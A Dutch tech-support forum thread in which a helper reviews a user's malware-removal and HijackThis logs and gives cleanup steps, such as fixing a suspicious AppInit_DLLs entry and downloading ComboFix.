[HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main]

"Start Page"="MSN NL: Hotmail, Outlook, Skype, Messenger, het laatste nieuws, entertainment en meer!"

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main]

"Start Page"="MSN NL: Hotmail, Outlook, Skype, Messenger, het laatste nieuws, entertainment en meer!"

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SearchScopes]

"DefaultScope"="{6A1806CD-94D4-4689-BA73-E35EA1EA9990}"

==== All HKCU SearchScopes ======================

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SearchScopes

{0633EE93-D776-472f-A0FF-E1416B8B2E3A} Bing Url="{searchTerms} - Bing"

{6A1806CD-94D4-4689-BA73-E35EA1EA9990} Google Url="{searchTerms} - Google Search}"

==== Deleting CLSID Registry Keys ======================

HKEY_USERS\S-1-5-21-1635193343-2580408697-3417977720-1000\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{12E48EC3-DAE3-2ED8-B71F-31DA42D2801F} deleted successfully

HKEY_USERS\S-1-5-21-1635193343-2580408697-3417977720-1000\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{12E48EC3-DAE3-2ED8-B71F-31DA42D2801F} deleted successfully

HKEY_USERS\S-1-5-21-1635193343-2580408697-3417977720-1000\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{2A4ECCE8-8568-8D63-8E87-7BDAB7BB4540} deleted successfully

HKEY_USERS\S-1-5-21-1635193343-2580408697-3417977720-1000\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{2A4ECCE8-8568-8D63-8E87-7BDAB7BB4540} deleted successfully

HKEY_USERS\S-1-5-21-1635193343-2580408697-3417977720-1000\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{4BC59B36-3D9F-69FF-9199-D601399B9BA5} deleted successfully

HKEY_USERS\S-1-5-21-1635193343-2580408697-3417977720-1000\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{4BC59B36-3D9F-69FF-9199-D601399B9BA5} deleted successfully

HKEY_USERS\S-1-5-21-1635193343-2580408697-3417977720-1000\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{4C72B9BB-6781-1173-877B-7738DF52FFB1} deleted successfully

HKEY_USERS\S-1-5-21-1635193343-2580408697-3417977720-1000\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{4C72B9BB-6781-1173-877B-7738DF52FFB1} deleted successfully

HKEY_USERS\S-1-5-21-1635193343-2580408697-3417977720-1000\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{5A4B963E-8E4D-EE74-2E10-62D6FB81CF0E} deleted successfully

HKEY_USERS\S-1-5-21-1635193343-2580408697-3417977720-1000\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{5A4B963E-8E4D-EE74-2E10-62D6FB81CF0E} deleted successfully

HKEY_USERS\S-1-5-21-1635193343-2580408697-3417977720-1000\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{7F34C586-6921-83D8-155D-AC4B6BA7BAE7} deleted successfully

HKEY_USERS\S-1-5-21-1635193343-2580408697-3417977720-1000\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{7F34C586-6921-83D8-155D-AC4B6BA7BAE7} deleted successfully

HKEY_USERS\S-1-5-21-1635193343-2580408697-3417977720-1000\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{DD91527A-6351-EDEF-1647-E4EE5D9E5E75} deleted successfully

HKEY_USERS\S-1-5-21-1635193343-2580408697-3417977720-1000\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{DD91527A-6351-EDEF-1647-E4EE5D9E5E75} deleted successfully

HKEY_USERS\S-1-5-21-1635193343-2580408697-3417977720-1000\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{FA060B01-161D-A876-DF07-052DF6B3FE99} deleted successfully

HKEY_USERS\S-1-5-21-1635193343-2580408697-3417977720-1000\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{FA060B01-161D-A876-DF07-052DF6B3FE99} deleted successfully

HKEY_USERS\S-1-5-21-1635193343-2580408697-3417977720-1000\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{FD170A41-6165-A7B7-87A7-2D45DC20934A} deleted successfully

HKEY_USERS\S-1-5-21-1635193343-2580408697-3417977720-1000\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{FD170A41-6165-A7B7-87A7-2D45DC20934A} deleted successfully

HKEY_USERS\S-1-5-21-1635193343-2580408697-3417977720-1000\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{FD3F5C3A-2AA8-89F7-AA92-D187D56416A9} deleted successfully

HKEY_USERS\S-1-5-21-1635193343-2580408697-3417977720-1000\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{FD3F5C3A-2AA8-89F7-AA92-D187D56416A9} deleted successfully

HKEY_USERS\S-1-5-21-1635193343-2580408697-3417977720-1000\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{024B5793-8559-9E62-14A2-819E7773D8C5} deleted successfully

HKEY_USERS\S-1-5-21-1635193343-2580408697-3417977720-1000\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{024B5793-8559-9E62-14A2-819E7773D8C5} deleted successfully

HKEY_USERS\S-1-5-21-1635193343-2580408697-3417977720-1000\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{48903315-A4D5-B3BA-ADA2-A5D6CE3C1F0C} deleted successfully

HKEY_USERS\S-1-5-21-1635193343-2580408697-3417977720-1000\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{48903315-A4D5-B3BA-ADA2-A5D6CE3C1F0C} deleted successfully

HKEY_USERS\S-1-5-21-1635193343-2580408697-3417977720-1000\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{5B70EDF0-B5D6-2896-E13C-18E118BFF38C} deleted successfully

HKEY_USERS\S-1-5-21-1635193343-2580408697-3417977720-1000\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{5B70EDF0-B5D6-2896-E13C-18E118BFF38C} deleted successfully

HKEY_USERS\S-1-5-21-1635193343-2580408697-3417977720-1000\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{8F45B891-B9A9-CB54-0ED1-0F93D78D1630} deleted successfully

HKEY_USERS\S-1-5-21-1635193343-2580408697-3417977720-1000\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{8F45B891-B9A9-CB54-0ED1-0F93D78D1630} deleted successfully

HKEY_USERS\S-1-5-21-1635193343-2580408697-3417977720-1000\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{A3602356-D596-EA2C-A573-868BC66CF4C0} deleted successfully

HKEY_USERS\S-1-5-21-1635193343-2580408697-3417977720-1000\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{A3602356-D596-EA2C-A573-868BC66CF4C0} deleted successfully

HKEY_USERS\S-1-5-21-1635193343-2580408697-3417977720-1000\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B3AE0881-79B2-75B2-BB59-F266AB2956F6} deleted successfully

HKEY_USERS\S-1-5-21-1635193343-2580408697-3417977720-1000\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{B3AE0881-79B2-75B2-BB59-F266AB2956F6} deleted successfully

HKEY_USERS\S-1-5-21-1635193343-2580408697-3417977720-1000\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{C7951997-F924-A43C-6EB5-2F8C8CF68589} deleted successfully

HKEY_USERS\S-1-5-21-1635193343-2580408697-3417977720-1000\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{C7951997-F924-A43C-6EB5-2F8C8CF68589} deleted successfully

HKEY_USERS\S-1-5-21-1635193343-2580408697-3417977720-1000\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{DADFFA21-EA6A-B9C0-A1F6-CEA30C1302B1} deleted successfully

HKEY_USERS\S-1-5-21-1635193343-2580408697-3417977720-1000\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{DADFFA21-EA6A-B9C0-A1F6-CEA30C1302B1} deleted successfully

HKEY_CLASSES_ROOT\Wow6432Node\CLSID\{12E48EC3-DAE3-2ED8-B71F-31DA42D2801F} deleted successfully

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{12E48EC3-DAE3-2ED8-B71F-31DA42D2801F} deleted successfully

HKEY_CLASSES_ROOT\Wow6432Node\CLSID\{2A4ECCE8-8568-8D63-8E87-7BDAB7BB4540} deleted successfully

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{2A4ECCE8-8568-8D63-8E87-7BDAB7BB4540} deleted successfully

HKEY_CLASSES_ROOT\Wow6432Node\CLSID\{4BC59B36-3D9F-69FF-9199-D601399B9BA5} deleted successfully

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{4BC59B36-3D9F-69FF-9199-D601399B9BA5} deleted successfully

HKEY_CLASSES_ROOT\Wow6432Node\CLSID\{4C72B9BB-6781-1173-877B-7738DF52FFB1} deleted successfully

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{4C72B9BB-6781-1173-877B-7738DF52FFB1} deleted successfully

HKEY_CLASSES_ROOT\Wow6432Node\CLSID\{5A4B963E-8E4D-EE74-2E10-62D6FB81CF0E} deleted successfully

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{5A4B963E-8E4D-EE74-2E10-62D6FB81CF0E} deleted successfully

HKEY_CLASSES_ROOT\Wow6432Node\CLSID\{7F34C586-6921-83D8-155D-AC4B6BA7BAE7} deleted successfully

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{7F34C586-6921-83D8-155D-AC4B6BA7BAE7} deleted successfully

HKEY_CLASSES_ROOT\Wow6432Node\CLSID\{DD91527A-6351-EDEF-1647-E4EE5D9E5E75} deleted successfully

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{DD91527A-6351-EDEF-1647-E4EE5D9E5E75} deleted successfully

HKEY_CLASSES_ROOT\Wow6432Node\CLSID\{FA060B01-161D-A876-DF07-052DF6B3FE99} deleted successfully

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{FA060B01-161D-A876-DF07-052DF6B3FE99} deleted successfully

HKEY_CLASSES_ROOT\Wow6432Node\CLSID\{FD170A41-6165-A7B7-87A7-2D45DC20934A} deleted successfully

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{FD170A41-6165-A7B7-87A7-2D45DC20934A} deleted successfully

HKEY_CLASSES_ROOT\Wow6432Node\CLSID\{FD3F5C3A-2AA8-89F7-AA92-D187D56416A9} deleted successfully

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{FD3F5C3A-2AA8-89F7-AA92-D187D56416A9} deleted successfully

HKEY_CLASSES_ROOT\Wow6432Node\CLSID\{024B5793-8559-9E62-14A2-819E7773D8C5} deleted successfully

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{024B5793-8559-9E62-14A2-819E7773D8C5} deleted successfully

HKEY_CLASSES_ROOT\Wow6432Node\CLSID\{48903315-A4D5-B3BA-ADA2-A5D6CE3C1F0C} deleted successfully

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{48903315-A4D5-B3BA-ADA2-A5D6CE3C1F0C} deleted successfully

HKEY_CLASSES_ROOT\Wow6432Node\CLSID\{5B70EDF0-B5D6-2896-E13C-18E118BFF38C} deleted successfully

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{5B70EDF0-B5D6-2896-E13C-18E118BFF38C} deleted successfully

HKEY_CLASSES_ROOT\Wow6432Node\CLSID\{8F45B891-B9A9-CB54-0ED1-0F93D78D1630} deleted successfully

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{8F45B891-B9A9-CB54-0ED1-0F93D78D1630} deleted successfully

HKEY_CLASSES_ROOT\Wow6432Node\CLSID\{A3602356-D596-EA2C-A573-868BC66CF4C0} deleted successfully

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{A3602356-D596-EA2C-A573-868BC66CF4C0} deleted successfully

HKEY_CLASSES_ROOT\Wow6432Node\CLSID\{B3AE0881-79B2-75B2-BB59-F266AB2956F6} deleted successfully

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{B3AE0881-79B2-75B2-BB59-F266AB2956F6} deleted successfully

HKEY_CLASSES_ROOT\Wow6432Node\CLSID\{C7951997-F924-A43C-6EB5-2F8C8CF68589} deleted successfully

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{C7951997-F924-A43C-6EB5-2F8C8CF68589} deleted successfully

HKEY_CLASSES_ROOT\Wow6432Node\CLSID\{DADFFA21-EA6A-B9C0-A1F6-CEA30C1302B1} deleted successfully

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{DADFFA21-EA6A-B9C0-A1F6-CEA30C1302B1} deleted successfully

==== Deleting CLSID Registry Values ======================

==== Deleting Registry Keys ======================

HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Google\Chrome\Extensions\bebnnlollpcjnfpkafhoclljaojgnfok deleted successfully

HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Google\Chrome\Extensions\nbmafkdmkkckhggblphicnnhlgljnoje deleted successfully

HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Google\Chrome\Extensions\pfmopbbadnfoelckkcmjjeaaegjpjjbk deleted successfully

==== HijackThis Entries ======================

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = Bing

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = Google

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = MSN NL: Hotmail, Outlook, Skype, Messenger, het laatste nieuws, entertainment en meer!

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = Bing

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = Bing

R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = MSN NL: Hotmail, Outlook, Skype, Messenger, het laatste nieuws, entertainment en meer!

R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =

R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =

R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm

F2 - REG:system.ini: UserInit=userinit.exe

O2 - BHO: HP Print Enhancer - {0347C33E-8762-4905-BF09-768834316C61} - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\hpswp_printenhancer.dll

O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll

O2 - BHO: Java Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre7\bin\ssv.dll

O2 - BHO: avast! Online Security - {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll

O2 - BHO: Aanmeldhulp voor Microsoft-account - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll

O2 - BHO: YrJie New Games - {A86EFAD9-8377-476D-9192-CF440B6F88EC} - C:\Program Files (x86)\IeAdsBlocker.dll

O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll

O2 - BHO: Google Toolbar Notifier BHO - {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} - C:\Program Files (x86)\Google\GoogleToolbarNotifier\5.7.8313.1002\swg.dll

O2 - BHO: URLRedirectionBHO - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\PROGRA~2\MICROS~1\Office14\URLREDIR.DLL

O2 - BHO: Java Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll

O2 - BHO: HP Smart BHO Class - {FFFFFFFF-CF4E-4F2B-BDC2-0E72E116A856} - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\hpswp_BHO.dll

O3 - Toolbar: avast! Online Security - {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll

O3 - Toolbar: Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll

O4 - HKLM\..\Run: [Adobe ARM] "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"

O4 - HKLM\..\Run: [NBKeyScan] "C:\Program Files (x86)\Nero\Nero8\Nero BackItUp\NBKeyScan.exe"

O4 - HKLM\..\Run: [avast] "C:\Program Files\AVAST Software\Avast\avastUI.exe" /nogui

O4 - HKLM\..\Run: [HP Software Update] C:\Program Files (x86)\HP\HP Software Update\HPWuSchd2.exe

O4 - HKLM\..\Run: [sunJavaUpdateSched] "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"

O4 - HKCU\..\Run: [indxStoreSvr_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}] "C:\Program Files (x86)\Common Files\Nero\Lib\NMIndexStoreSvr.exe" ASO-616B5711-6DAE-4795-A05F-39A1E5104020

O4 - HKCU\..\Run: [spotify Web Helper] "C:\Users\Kim\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe"

O4 - HKCU\..\Run: [spotify] "C:\Users\Kim\AppData\Roaming\Spotify\Spotify.exe" /uri spotify:autostart

O4 - HKUS\S-1-5-19\..\Run: [sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (User 'LOCAL SERVICE')

O4 - HKUS\S-1-5-19\..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (User 'LOCAL SERVICE')

O4 - HKUS\S-1-5-20\..\Run: [sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (User 'NETWORK SERVICE')

O4 - HKUS\S-1-5-20\..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (User 'NETWORK SERVICE')

O4 - Global Startup: HP Digital Imaging Monitor.lnk = C:\Program Files (x86)\HP\Digital Imaging\bin\hpqtra08.exe

O8 - Extra context menu item: E&xporteren naar Microsoft Excel - res://C:\PROGRA~1\MICROS~1\Office14\EXCEL.EXE/3000

O9 - Extra button: Toon of verberg HP Smart Web Printing - {DDE87865-83C5-48c4-8357-2F5B1AA84522} - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\hpswp_BHO.dll

O10 - Unknown file in Winsock LSP: c:\program files (x86)\common files\microsoft shared\windows live\wlidnsp.dll

O10 - Unknown file in Winsock LSP: c:\program files (x86)\common files\microsoft shared\windows live\wlidnsp.dll

O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab

O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~2\COMMON~1\Skype\SKYPE4~1.DLL

O18 - Protocol: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files (x86)\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll

O18 - Filter hijack: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL

O20 - AppInit_DLLs: c:\progra~2\websea~1\sprote~1.dll

O23 - Service: Adobe Acrobat Update Service (AdobeARMservice) - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe

O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\Windows\System32\alg.exe (file missing)

O23 - Service: AMD External Events Utility - Unknown owner - C:\Windows\system32\atiesrxx.exe (file missing)

O23 - Service: avast! Antivirus - AVAST Software - C:\Program Files\AVAST Software\Avast\AvastSvc.exe

O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\Windows\System32\lsass.exe (file missing)

O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\Windows\system32\fxssvc.exe (file missing)

O23 - Service: Google Update-service (gupdate) (gupdate) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

O23 - Service: Google Update-service (gupdatem) (gupdatem) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

O23 - Service: Google Software Updater (gusvc) - Google - C:\Program Files (x86)\Google\Common\Google Updater\GoogleUpdaterService.exe

O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)

O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\Windows\System32\msdtc.exe (file missing)

O23 - Service: Nero BackItUp Scheduler 3 - Nero AG - C:\Program Files (x86)\Nero\Nero8\Nero BackItUp\NBService.exe

O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)

O23 - Service: NMIndexingService - Nero AG - C:\Program Files (x86)\Common Files\Nero\Lib\NMIndexingService.exe

O23 - Service: Online Games Manager (ogmservice) - RealNetworks, Inc. - C:\Program Files (x86)\Online Games Manager\ogmservice.exe

O23 - Service: PLFlash DeviceIoControl Service - Prolific Technology Inc. - C:\Windows\SysWOW64\IoctlSvc.exe

O23 - Service: @%systemroot%\system32\psbase.dll,-300 (ProtectedStorage) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)

O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\Windows\system32\locator.exe (file missing)

O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)

O23 - Service: Skype Updater (SkypeUpdate) - Skype Technologies - C:\Program Files (x86)\Skype\Updater\Updater.exe

O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\Windows\System32\snmptrap.exe (file missing)

O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\Windows\System32\spoolsv.exe (file missing)

O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\Windows\system32\sppsvc.exe (file missing)

O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\Windows\system32\UI0Detect.exe (file missing)

O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)

O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\Windows\System32\vds.exe (file missing)

O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\Windows\system32\vssvc.exe (file missing)

O23 - Service: @%SystemRoot%\system32\Wat\WatUX.exe,-601 (WatAdminSvc) - Unknown owner - C:\Windows\system32\Wat\WatAdminSvc.exe (file missing)

O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\Windows\system32\wbengine.exe (file missing)

O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\Windows\system32\wbem\WmiApSrv.exe (file missing)

O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)

==== Empty IE Cache ======================

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5 emptied successfully

C:\Users\Default\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5 emptied successfully

C:\Users\Kim\AppData\Local\Temp\acrord32_sbx\Temporary Internet Files\Content.IE5 emptied successfully

C:\Users\Kim\AppData\Local\Temp\Low\Temporary Internet Files\Content.IE5 emptied successfully

C:\Users\Kim\AppData\Local\Temp\Temporary Internet Files\Content.IE5 emptied successfully

C:\Windows\serviceprofiles\LocalService\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5 emptied successfully

C:\Windows\serviceprofiles\LocalService\AppData\Local\Temp\Temporary Internet Files\Content.IE5 emptied successfully

C:\Windows\serviceprofiles\NetworkService\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5 emptied successfully

C:\Users\Kim\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\0ULFAHC5 will be deleted at reboot

C:\Users\Kim\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\9EPNZW5K will be deleted at reboot

C:\Users\Kim\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\J6F3KGC2 will be deleted at reboot

C:\Users\Kim\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\JGNNTEE6 will be deleted at reboot

C:\Users\Kim\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\VRY2MDAS will be deleted at reboot

C:\Users\Kim\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\YZBNY033 will be deleted at reboot

C:\Users\Kim\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\index.dat will be deleted at reboot

C:\Users\Kim\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\index.dat will be deleted at reboot

C:\Windows\sysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\index.dat will be deleted at reboot

==== Empty FireFox Cache ======================

C:\users\Kim\AppData\Local\Mozilla\Firefox\Profiles\o3rq6e92.default\Cache emptied successfully

==== Empty Chrome Cache ======================

C:\users\Kim\AppData\Local\Google\Chrome\User Data\Default\Cache emptied successfully

==== Empty All Flash Cache ======================

Flash Cache Emptied Successfully

==== Empty All Java Cache ======================

Java Cache cleared successfully

==== After Reboot ======================

==== Empty Temp Folders ======================

C:\Windows\Temp successfully emptied

C:\Users\Kim\AppData\Local\Temp successfully emptied

==== Empty Recycle Bin ======================

C:\$RECYCLE.BIN successfully emptied

==== Deleting Files / Folders ======================

"C:\Users\Kim\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\index.dat" not found

"C:\Users\Kim\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\index.dat" not found

"C:\Windows\sysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\index.dat" not found

"C:\Users\Kim\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\0ULFAHC5" not found

"C:\Users\Kim\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\9EPNZW5K" not found

"C:\Users\Kim\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\J6F3KGC2" not found

"C:\Users\Kim\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\JGNNTEE6" not found

"C:\Users\Kim\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\VRY2MDAS" not found

"C:\Users\Kim\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\YZBNY033" not found

Link naar reactie
Delen op andere sites

Dat is een hele opruiming.

Let op : Windows Vista & 7 gebruikers dienen HijackThis als “administrator” uit te voeren via rechtermuisknop “als administrator uitvoeren". Indien dit via de snelkoppeling niet lukt voer je HijackThis als administrator uit in de volgende map : C:\Program Files\Trend Micro\HiJackThis of C:\Program Files (x86)\Trend Micro\HiJackThis.

Start Hijackthis op. Selecteer “Scan”. Selecteer alleen de items die hieronder zijn genoemd:

O20 - AppInit_DLLs: c:\progra~2\websea~1\sprote~1.dll

Klik op 'Fix checked' om de items te verwijderen.

Hoe is het nu met de snelheid?

Link naar reactie
Delen op andere sites

  • 2 weken later...

Download 51a5bf3d99e8a-ComboFixlogo16.pngComboFix van één van de onderstaande locaties naar het bureaublad.

Bleeping Computer

Info Spyware

